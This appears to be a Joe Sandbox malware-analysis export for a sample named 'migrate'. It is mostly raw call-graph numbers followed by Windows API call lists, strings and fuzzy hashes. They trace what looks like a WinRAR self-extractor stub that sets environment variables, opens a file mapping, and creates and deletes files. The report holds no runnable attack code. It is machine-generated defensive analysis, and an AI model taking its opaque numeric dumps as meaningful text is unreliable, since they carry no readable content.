120d06 23656->23658 23657->23654 23659 120d73 23658->23659 23660 120d0d 23658->23660 23661 114092 _swprintf 51 API calls 23659->23661 23662 12081b 2 API calls 23660->23662 23663 120d9b AllocConsole 23661->23663 23664 120d17 23662->23664 23665 120df3 ExitProcess 23663->23665 23666 120da8 GetCurrentProcessId AttachConsole 23663->23666 23667 12081b 2 API calls 23664->23667 23744 133e13 23666->23744 23669 120d21 23667->23669 23740 11e617 23669->23740 23670 120dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23670->23665 23673 114092 _swprintf 51 API calls 23674 120d4f 23673->23674 23675 11e617 53 API calls 23674->23675 23676 120d5e 23675->23676 23676->23665 23677->23511 23679 12081b 2 API calls 23678->23679 23680 12ac2a OleInitialize 23679->23680 23681 12ac4d GdiplusStartup SHGetMalloc 23680->23681 23681->23513 23686 12c5ce 23682->23686 23683 12c6e4 23683->23522 23683->23523 23685 121fac CharUpperW 23685->23686 23686->23683 23686->23685 23769 11f3fa 23686->23769 23688 12ec50 23687->23688 23689 12dbeb SetEnvironmentVariableW 23688->23689 23691 12dc0e 23689->23691 23690 12dc36 23690->23515 23691->23690 23692 12dc2a SetEnvironmentVariableW 23691->23692 23692->23690 23798 114065 23693->23798 23696 12b6dd LoadBitmapW 23697 12b70b GetObjectW 23696->23697 23698 12b6fe 23696->23698 23700 12b71a 23697->23700 23875 12a6c2 FindResourceW 23698->23875 23870 12a5c6 23700->23870 23704 12b770 23715 11da42 23704->23715 23705 12b74c 23891 12a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23705->23891 23706 12a6c2 13 API calls 23708 12b73d 23706->23708 23708->23705 23710 12b743 DeleteObject 23708->23710 23709 12b754 23892 12a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23709->23892 23710->23705 23712 12b75d 23893 12a80c 8 API calls 23712->23893 23714 12b764 DeleteObject 23714->23704 23904 11da67 23715->23904 23720 1290b7 24037 12eb38 23720->24037 23724 12acab GdiplusShutdown CoUninitialize 23723->23724 23724->23551 23726->23543 23727->23549 23729 12086d GetModuleHandleW 23728->23729 
23729->23632 23729->23633 23731 11b196 23730->23731 23732 11b15a GetVersionExW 23730->23732 23731->23645 23732->23731 23734 12ec50 23733->23734 23735 120828 GetSystemDirectoryW 23734->23735 23736 120840 23735->23736 23737 12085e 23735->23737 23738 120851 LoadLibraryW 23736->23738 23737->23645 23738->23737 23739->23637 23741 11e627 23740->23741 23746 11e648 23741->23746 23745 133e1b 23744->23745 23745->23670 23745->23745 23752 11d9b0 23746->23752 23749 11e645 23749->23673 23750 11e66b LoadStringW 23750->23749 23751 11e682 LoadStringW 23750->23751 23751->23749 23757 11d8ec 23752->23757 23754 11d9cd 23755 11d9e2 23754->23755 23765 11d9f0 26 API calls 23754->23765 23755->23749 23755->23750 23758 11d904 23757->23758 23764 11d984 _strncpy 23757->23764 23761 11d928 23758->23761 23766 121da7 WideCharToMultiByte 23758->23766 23760 11d959 23768 136159 26 API calls 3 library calls 23760->23768 23761->23760 23767 11e5b1 50 API calls __vsnprintf 23761->23767 23764->23754 23765->23755 23766->23761 23767->23760 23768->23764 23770 11f420 _wcslen 23769->23770 23771 11f409 __cftof 23769->23771 23773 11f303 23770->23773 23771->23686 23774 11f314 __InternalCxxFrameHandler 23773->23774 23777 11f344 23774->23777 23778 11f35c 23777->23778 23779 11f352 23777->23779 23781 11f3d1 GetCurrentProcessId 23778->23781 23782 11f376 23778->23782 23789 11f2c5 23779->23789 23788 11f33e 23781->23788 23782->23788 23795 116c36 76 API calls __vswprintf_c_l 23782->23795 23784 11f399 23796 116dcb 76 API calls 23784->23796 23786 11f3a2 23797 116c31 RaiseException CallUnexpected 23786->23797 23788->23771 23790 11f2fd 23789->23790 23791 11f2ce 23789->23791 23790->23778 23792 12081b 2 API calls 23791->23792 23793 11f2d8 23792->23793 23793->23790 23794 11f2de GetProcAddress GetProcAddress 23793->23794 23794->23790 23795->23784 23796->23786 23797->23788 23799 11407c __vswprintf_c_l 23798->23799 23802 135fd4 23799->23802 23805 134097 23802->23805 23806 1340d7 23805->23806 23807 1340bf 23805->23807 23806->23807 
23809 1340df 23806->23809 23822 1391a8 20 API calls __dosmaperr 23807->23822 23824 134636 23809->23824 23810 1340c4 23823 139087 26 API calls __cftof 23810->23823 23814 12fbbc _ValidateLocalCookies 5 API calls 23817 114086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23814->23817 23816 134167 23833 1349e6 51 API calls 4 library calls 23816->23833 23817->23696 23820 1340cf 23820->23814 23821 134172 23834 1346b9 20 API calls _free 23821->23834 23822->23810 23823->23820 23825 134653 23824->23825 23826 1340ef 23824->23826 23825->23826 23835 1397e5 GetLastError 23825->23835 23832 134601 20 API calls 2 library calls 23826->23832 23828 134674 23856 13993a 38 API calls __cftof 23828->23856 23830 13468d 23857 139967 38 API calls __cftof 23830->23857 23832->23816 23833->23821 23834->23820 23836 139807 23835->23836 23837 1397fb 23835->23837 23859 13b136 20 API calls 2 library calls 23836->23859 23858 13ae5b 11 API calls 2 library calls 23837->23858 23840 139801 23840->23836 23842 139850 SetLastError 23840->23842 23841 139813 23843 13981b 23841->23843 23866 13aeb1 11 API calls 2 library calls 23841->23866 23842->23828 23860 138dcc 23843->23860 23846 139830 23846->23843 23848 139837 23846->23848 23847 139821 23850 13985c SetLastError 23847->23850 23867 139649 20 API calls _unexpected 23848->23867 23868 138d24 38 API calls _abort 23850->23868 23851 139842 23853 138dcc _free 20 API calls 23851->23853 23855 139849 23853->23855 23855->23842 23855->23850 23856->23830 23857->23826 23858->23840 23859->23841 23861 138dd7 RtlFreeHeap 23860->23861 23862 138e00 _free 23860->23862 23861->23862 23863 138dec 23861->23863 23862->23847 23869 1391a8 20 API calls __dosmaperr 23863->23869 23865 138df2 GetLastError 23865->23862 23866->23846 23867->23851 23869->23865 23894 12a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23870->23894 23872 12a5cd 23873 12a5d9 23872->23873 23895 12a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23872->23895 23873->23704 23873->23705 23873->23706 23876 
12a6e5 SizeofResource 23875->23876 23877 12a7d3 23875->23877 23876->23877 23878 12a6fc LoadResource 23876->23878 23877->23697 23877->23700 23878->23877 23879 12a711 LockResource 23878->23879 23879->23877 23880 12a722 GlobalAlloc 23879->23880 23880->23877 23881 12a73d GlobalLock 23880->23881 23882 12a7cc GlobalFree 23881->23882 23883 12a74c __InternalCxxFrameHandler 23881->23883 23882->23877 23884 12a754 CreateStreamOnHGlobal 23883->23884 23885 12a7c5 GlobalUnlock 23884->23885 23886 12a76c 23884->23886 23885->23882 23896 12a626 GdipAlloc 23886->23896 23889 12a7b0 23889->23885 23890 12a79a GdipCreateHBITMAPFromBitmap 23890->23889 23891->23709 23892->23712 23893->23714 23894->23872 23895->23873 23897 12a638 23896->23897 23899 12a645 23896->23899 23900 12a3b9 23897->23900 23899->23885 23899->23889 23899->23890 23901 12a3e1 GdipCreateBitmapFromStream 23900->23901 23902 12a3da GdipCreateBitmapFromStreamICM 23900->23902 23903 12a3e6 23901->23903 23902->23903 23903->23899 23905 11da75 __EH_prolog 23904->23905 23906 11daa4 GetModuleFileNameW 23905->23906 23907 11dad5 23905->23907 23908 11dabe 23906->23908 23950 1198e0 23907->23950 23908->23907 23910 11db31 23961 136310 23910->23961 23912 11e261 78 API calls 23915 11db05 23912->23915 23915->23910 23915->23912 23929 11dd4a 23915->23929 23916 11db44 23917 136310 26 API calls 23916->23917 23925 11db56 ___vcrt_FlsSetValue 23917->23925 23918 11dc85 23918->23929 23997 119d70 81 API calls 23918->23997 23922 11dc9f ___std_exception_copy 23923 119bd0 82 API calls 23922->23923 23922->23929 23926 11dcc8 ___std_exception_copy 23923->23926 23925->23918 23925->23929 23975 119e80 23925->23975 23991 119bd0 23925->23991 23996 119d70 81 API calls 23925->23996 23928 11dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 23926->23928 23926->23929 23998 121b84 MultiByteToWideChar 23926->23998 23928->23929 23931 11e159 23928->23931 23944 121da7 WideCharToMultiByte 23928->23944 23999 11e5b1 50 API calls __vsnprintf 23928->23999 24000 136159 26 
API calls 3 library calls 23928->24000 24001 138cce 26 API calls 2 library calls 23928->24001 24002 137625 26 API calls 2 library calls 23928->24002 24003 11e27c 78 API calls 23928->24003 23984 11959a 23929->23984 23941 11e1de 23931->23941 24004 138cce 26 API calls 2 library calls 23931->24004 23933 11e16e 24005 137625 26 API calls 2 library calls 23933->24005 23934 11e1c6 24006 11e27c 78 API calls 23934->24006 23935 11e214 23937 136310 26 API calls 23935->23937 23940 11e22d 23937->23940 23939 11e261 78 API calls 23939->23941 23942 136310 26 API calls 23940->23942 23941->23935 23941->23939 23942->23929 23944->23928 23948 11e29e GetModuleHandleW FindResourceW 23949 11da55 23948->23949 23949->23720 23951 1198ea 23950->23951 23952 11994b CreateFileW 23951->23952 23953 11996c GetLastError 23952->23953 23956 1199bb 23952->23956 24007 11bb03 23953->24007 23955 11998c 23955->23956 23958 119990 CreateFileW GetLastError 23955->23958 23957 1199ff 23956->23957 23959 1199e5 SetFileTime 23956->23959 23957->23915 23958->23956 23960 1199b5 23958->23960 23959->23957 23960->23956 23962 136349 23961->23962 23963 13634d 23962->23963 23974 136375 23962->23974 24011 1391a8 20 API calls __dosmaperr 23963->24011 23965 136352 24012 139087 26 API calls __cftof 23965->24012 23966 136699 23968 12fbbc _ValidateLocalCookies 5 API calls 23966->23968 23970 1366a6 23968->23970 23969 13635d 23971 12fbbc _ValidateLocalCookies 5 API calls 23969->23971 23970->23916 23973 136369 23971->23973 23973->23916 23974->23966 24013 136230 5 API calls _ValidateLocalCookies 23974->24013 23976 119e92 23975->23976 23980 119ea5 23975->23980 23979 119eb0 23976->23979 24014 116d5b 77 API calls 23976->24014 23978 119eb8 SetFilePointer 23978->23979 23981 119ed4 GetLastError 23978->23981 23979->23925 23980->23978 23980->23979 23981->23979 23982 119ede 23981->23982 23982->23979 24015 116d5b 77 API calls 23982->24015 23985 1195cf 23984->23985 23986 1195be 23984->23986 23985->23948 23986->23985 23987 1195d1 23986->23987 
23988 1195ca 23986->23988 24021 119620 23987->24021 24016 11974e 23988->24016 23992 119bdc 23991->23992 23994 119be3 23991->23994 23992->23925 23994->23992 23995 119785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23994->23995 24036 116d1a 77 API calls 23994->24036 23995->23994 23996->23925 23997->23922 23998->23928 23999->23928 24000->23928 24001->23928 24002->23928 24003->23928 24004->23933 24005->23934 24006->23941 24008 11bb10 _wcslen 24007->24008 24009 11bbb8 GetCurrentDirectoryW 24008->24009 24010 11bb39 _wcslen 24008->24010 24009->24010 24010->23955 24011->23965 24012->23969 24013->23974 24014->23980 24015->23979 24017 119781 24016->24017 24018 119757 24016->24018 24017->23985 24018->24017 24027 11a1e0 24018->24027 24022 11964a 24021->24022 24024 11962c 24021->24024 24023 119669 24022->24023 24035 116bd5 76 API calls 24022->24035 24023->23985 24024->24022 24025 119638 CloseHandle 24024->24025 24025->24022 24028 12ec50 24027->24028 24029 11a1ed DeleteFileW 24028->24029 24030 11a200 24029->24030 24031 11977f 24029->24031 24032 11bb03 GetCurrentDirectoryW 24030->24032 24031->23985 24033 11a214 24032->24033 24033->24031 24034 11a218 DeleteFileW 24033->24034 24034->24031 24035->24023 24036->23994 24039 12eb3d ___std_exception_copy 24037->24039 24038 1290d6 24038->23535 24039->24038 24042 12eb59 24039->24042 24046 137a5e 7 API calls 2 library calls 24039->24046 24041 12f5c9 24048 13238d RaiseException 24041->24048 24042->24041 24047 13238d RaiseException 24042->24047 24045 12f5e6 24046->24039 24047->24041 24048->24045 24050 137ce1 _unexpected 24049->24050 24051 137cfa 24050->24051 24052 137ce8 24050->24052 24073 13ac31 EnterCriticalSection 24051->24073 24088 137e2f GetModuleHandleW 24052->24088 24055 137ced 24055->24051 24089 137e73 GetModuleHandleExW 24055->24089 24056 137d9f 24077 137ddf 24056->24077 24060 137d01 24060->24056 24062 137d76 24060->24062 24074 1387e0 24060->24074 24063 137d8e 24062->24063 24067 138a91 _abort 5 API calls 24062->24067 
24068 138a91 _abort 5 API calls 24063->24068 24064 137de8 24097 142390 5 API calls _ValidateLocalCookies 24064->24097 24065 137dbc 24080 137dee 24065->24080 24067->24063 24068->24056 24073->24060 24098 138519 24074->24098 24117 13ac81 LeaveCriticalSection 24077->24117 24079 137db8 24079->24064 24079->24065 24118 13b076 24080->24118 24083 137e1c 24086 137e73 _abort 8 API calls 24083->24086 24084 137dfc GetPEB 24084->24083 24085 137e0c GetCurrentProcess TerminateProcess 24084->24085 24085->24083 24087 137e24 ExitProcess 24086->24087 24088->24055 24090 137ec0 24089->24090 24091 137e9d GetProcAddress 24089->24091 24092 137ec6 FreeLibrary 24090->24092 24093 137ecf 24090->24093 24094 137eb2 24091->24094 24092->24093 24095 12fbbc _ValidateLocalCookies 5 API calls 24093->24095 24094->24090 24096 137cf9 24095->24096 24096->24051 24101 1384c8 24098->24101 24100 13853d 24100->24062 24102 1384d4 ___scrt_is_nonwritable_in_current_image 24101->24102 24109 13ac31 EnterCriticalSection 24102->24109 24104 1384e2 24110 138569 24104->24110 24108 138500 _abort 24108->24100 24109->24104 24113 138589 24110->24113 24114 138591 24110->24114 24111 12fbbc _ValidateLocalCookies 5 API calls 24112 1384ef 24111->24112 24116 13850d LeaveCriticalSection _abort 24112->24116 24113->24111 24114->24113 24115 138dcc _free 20 API calls 24114->24115 24115->24113 24116->24108 24117->24079 24119 13b091 24118->24119 24120 13b09b 24118->24120 24122 12fbbc _ValidateLocalCookies 5 API calls 24119->24122 24124 13ac98 24120->24124 24123 137df8 24122->24123 24123->24083 24123->24084 24125 13acc8 24124->24125 24128 13acc4 24124->24128 24125->24119 24127 13acf4 GetProcAddress 24129 13ad04 _unexpected 24127->24129 24128->24125 24130 13ace8 24128->24130 24131 13ad34 24128->24131 24129->24125 24130->24125 24130->24127 24132 13ad55 LoadLibraryExW 24131->24132 24137 13ad4a 24131->24137 24133 13ad72 GetLastError 24132->24133 24134 13ad8a 24132->24134 24133->24134 24135 13ad7d LoadLibraryExW 24133->24135 24136 13ada1 
FreeLibrary 24134->24136 24134->24137 24135->24134 24136->24137 24137->24128 25485 12b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24138 12e5b1 24139 12e578 24138->24139 24141 12e85d 24139->24141 24167 12e5bb 24141->24167 24143 12e86d 24144 12e8ca 24143->24144 24145 12e8ee 24143->24145 24146 12e7fb DloadReleaseSectionWriteAccess 6 API calls 24144->24146 24148 12e966 LoadLibraryExA 24145->24148 24149 12e9c7 24145->24149 24152 12e9d9 24145->24152 24155 12ea95 24145->24155 24147 12e8d5 RaiseException 24146->24147 24162 12eac3 24147->24162 24148->24149 24150 12e979 GetLastError 24148->24150 24151 12e9d2 FreeLibrary 24149->24151 24149->24152 24153 12e9a2 24150->24153 24161 12e98c 24150->24161 24151->24152 24154 12ea37 GetProcAddress 24152->24154 24152->24155 24157 12e7fb DloadReleaseSectionWriteAccess 6 API calls 24153->24157 24154->24155 24156 12ea47 GetLastError 24154->24156 24176 12e7fb 24155->24176 24159 12ea5a 24156->24159 24158 12e9ad RaiseException 24157->24158 24158->24162 24159->24155 24163 12e7fb DloadReleaseSectionWriteAccess 6 API calls 24159->24163 24161->24149 24161->24153 24162->24139 24164 12ea7b RaiseException 24163->24164 24165 12e5bb ___delayLoadHelper2@8 6 API calls 24164->24165 24166 12ea92 24165->24166 24166->24155 24168 12e5c7 24167->24168 24169 12e5ed 24167->24169 24184 12e664 24168->24184 24169->24143 24171 12e5cc 24172 12e5e8 24171->24172 24187 12e78d 24171->24187 24192 12e5ee GetModuleHandleW GetProcAddress GetProcAddress 24172->24192 24175 12e836 24175->24143 24177 12e82f 24176->24177 24178 12e80d 24176->24178 24177->24162 24179 12e664 DloadReleaseSectionWriteAccess 3 API calls 24178->24179 24180 12e812 24179->24180 24181 12e82a 24180->24181 24182 12e78d DloadProtectSection 3 API calls 24180->24182 24195 12e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24181->24195 24182->24181 24193 12e5ee GetModuleHandleW GetProcAddress GetProcAddress 24184->24193 24186 12e669 24186->24171 24188 12e7a2 
DloadProtectSection 24187->24188 24189 12e7dd VirtualProtect 24188->24189 24190 12e7a8 24188->24190 24194 12e6a3 VirtualQuery GetSystemInfo 24188->24194 24189->24190 24190->24172 24192->24175 24193->24186 24194->24189 24195->24177 25523 121bbd GetCPInfo IsDBCSLeadByte 25524 12f3a0 27 API calls 25458 13a4a0 71 API calls _free 25461 12dca1 DialogBoxParamW 25502 13a6a0 31 API calls 2 library calls 25462 1408a0 IsProcessorFeaturePresent 25487 12eda7 48 API calls _unexpected 25525 116faa 111 API calls 3 library calls 25463 12f4d3 20 API calls 24207 12e1d1 14 API calls ___delayLoadHelper2@8 25526 13a3d0 21 API calls 2 library calls 24208 1110d5 24213 115abd 24208->24213 24214 115ac7 __EH_prolog 24213->24214 24220 11b505 24214->24220 24216 115ad3 24226 115cac GetCurrentProcess GetProcessAffinityMask 24216->24226 24221 11b50f __EH_prolog 24220->24221 24227 11f1d0 82 API calls 24221->24227 24223 11b521 24228 11b61e 24223->24228 24227->24223 24229 11b630 __cftof 24228->24229 24232 1210dc 24229->24232 24235 12109e GetCurrentProcess GetProcessAffinityMask 24232->24235 24236 11b597 24235->24236 24236->24216 25527 142bd0 VariantClear 24237 12e2d7 24238 12e1db 24237->24238 24239 12e85d ___delayLoadHelper2@8 14 API calls 24238->24239 24239->24238 25504 130ada 51 API calls 2 library calls 24343 12dec2 24344 12decf 24343->24344 24345 11e617 53 API calls 24344->24345 24346 12dedc 24345->24346 24347 114092 _swprintf 51 API calls 24346->24347 24348 12def1 SetDlgItemTextW 24347->24348 24351 12b568 PeekMessageW 24348->24351 24352 12b583 GetMessageW 24351->24352 24353 12b5bc 24351->24353 24354 12b5a8 TranslateMessage DispatchMessageW 24352->24354 24355 12b599 IsDialogMessageW 24352->24355 24354->24353 24355->24353 24355->24354 25490 12b5c0 100 API calls 25528 1277c0 118 API calls 25529 12ffc0 RaiseException _com_error::_com_error CallUnexpected 25505 1262ca 123 API calls __InternalCxxFrameHandler 25491 1195f0 80 API calls 25507 115ef0 82 API calls 24366 1398f0 24374 13adaf 24366->24374 
[Control-flow graph node/edge listing (rendered graph data for the analysed functions, e.g. the dialog procedure at 0012B7E0 and its callees) not reproduced]

Control-flow Graph

APIs
  • Part of subcall function 00120863: GetModuleHandleW.KERNEL32(kernel32), ref: 0012087C
  • Part of subcall function 00120863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0012088E
  • Part of subcall function 00120863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001208BF
  • Part of subcall function 0012A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0012A655
  • Part of subcall function 0012AC16: OleInitialize.OLE32(00000000), ref: 0012AC2F
  • Part of subcall function 0012AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0012AC66
  • Part of subcall function 0012AC16: SHGetMalloc.SHELL32(00158438), ref: 0012AC70
• GetCommandLineW.KERNEL32 ref: 0012DF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0012DF83
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0012DF94
• UnmapViewOfFile.KERNEL32(00000000), ref: 0012DFCE
  • Part of subcall function 0012DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0012DBF4
  • Part of subcall function 0012DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0012DC30
• CloseHandle.KERNEL32(00000000), ref: 0012DFD7
• GetModuleFileNameW.KERNEL32(00000000,0016EC90,00000800), ref: 0012DFF2
• SetEnvironmentVariableW.KERNEL32(sfxname,0016EC90), ref: 0012DFFE
• GetLocalTime.KERNEL32(?), ref: 0012E009
• _swprintf.LIBCMT ref: 0012E048
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0012E05A
• GetModuleHandleW.KERNEL32(00000000), ref: 0012E061
• LoadIconW.USER32(00000000,00000064), ref: 0012E078
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0012E0C9
• Sleep.KERNEL32(?), ref: 0012E0F7
• DeleteObject.GDI32 ref: 0012E130
• DeleteObject.GDI32(?), ref: 0012E140
• CloseHandle.KERNEL32 ref: 0012E183

Strings

Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$c:\programdata$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                                    • API String ID: 3049964643-3155487436
                                                                                                                                                                                                    • Opcode ID: 23b87e63729b6594c27c3efc98e4caf534e4fd1c184cee7e95d5989228e65eaa
                                                                                                                                                                                                    • Instruction ID: e75a10e3d4bb0b6a96b683ca89a6d79e5baad7cf16b490bfe372745c9e8c5838
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23b87e63729b6594c27c3efc98e4caf534e4fd1c184cee7e95d5989228e65eaa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC613235904364AFD320ABB4FC49F6B3BECAB15704F040429F805966E2EBB499E4C762

Control-flow Graph (graph image not reproduced in this text export)
APIs
• FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6C4
  • Part of subcall function 0011BB03: _wcslen.LIBCMT ref: 0011BB27
• FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6F2
• GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6FE
• FindNextFileW.KERNEL32(?,?,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A728
• GetLastError.KERNEL32(?,?,?,?,0011A592,000000FF,?,?), ref: 0011A734
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: FileFind$ErrorFirstLast$Next_wcslen
• String ID:
• API String ID: 42610566-0
• Opcode ID: 98b81bbe765e984077ce6c728cd75f8347caae8710c569c5ea852699efef990b
• Instruction ID: dfec2e00569deb8a3570b08c3d0782796549f0e322d99712cca5767d7c4503b2
• Opcode Fuzzy Hash: 98b81bbe765e984077ce6c728cd75f8347caae8710c569c5ea852699efef990b
• Instruction Fuzzy Hash: A3417B76901115ABCB29DF68DC88AEAF7B8BF49350F5042A6F569E3240D7346ED0CF90
APIs
• GetCurrentProcess.KERNEL32(?,?,00137DC4,?,0014C300,0000000C,00137F1B,?,00000002,00000000), ref: 00137E0F
• TerminateProcess.KERNEL32(00000000,?,00137DC4,?,0014C300,0000000C,00137F1B,?,00000002,00000000), ref: 00137E16
• ExitProcess.KERNEL32 ref: 00137E28
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 1583b4f13225aebad09fedf70ac5e4e762be5149a1c7f390e2bf86037af74021
• Instruction ID: 05596f558c009a6362ad162b3d913eec15e4438153de462a0b06b0d197015f15
• Opcode Fuzzy Hash: 1583b4f13225aebad09fedf70ac5e4e762be5149a1c7f390e2bf86037af74021
• Instruction Fuzzy Hash: 49E08C75004148EFCF216F20ED0AA8A7FBAEF11341F004464F8298B572CB36DE92CB90
APIs
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 94de0165a4ad0095345c2db9482286d836f8eee8a12256dae15b341117fd423f
• Instruction ID: 2fd90a5c8ae931c0a71922af57dd819428bf15abdd1d989df3596786bbdb8cd9
• Opcode Fuzzy Hash: 94de0165a4ad0095345c2db9482286d836f8eee8a12256dae15b341117fd423f
• Instruction Fuzzy Hash: EA820D71904245AEDF1DDF64C891BFEBBB9BF15300F0881B9E8599B182DB315AC9CB60
APIs
• __EH_prolog.LIBCMT ref: 0012B7E5
  • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
  • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0012B8D1
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B8EF
• IsDialogMessageW.USER32(?,?), ref: 0012B902
• TranslateMessage.USER32(?), ref: 0012B910
• DispatchMessageW.USER32(?), ref: 0012B91A
• GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0012B93D
• KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0012B960
• GetDlgItem.USER32(?,00000068), ref: 0012B983
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0012B99E
• SendMessageW.USER32(00000000,000000C2,00000000,001435F4), ref: 0012B9B1
  • Part of subcall function 0012D453: _wcslen.LIBCMT ref: 0012D47D
• SetFocus.USER32(00000000), ref: 0012B9B8
• _swprintf.LIBCMT ref: 0012BA24
  • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
  • Part of subcall function 0012D4D4: GetDlgItem.USER32(00000068,0016FCB8), ref: 0012D4E8
  • Part of subcall function 0012D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0012AF07,00000001,?,?,0012B7B9,0014506C,0016FCB8,0016FCB8,00001000,00000000,00000000), ref: 0012D510
  • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0012D51B
  • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000C2,00000000,001435F4), ref: 0012D529
  • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0012D53F
  • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0012D559
  • Part of subcall function 0012D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0012D59D
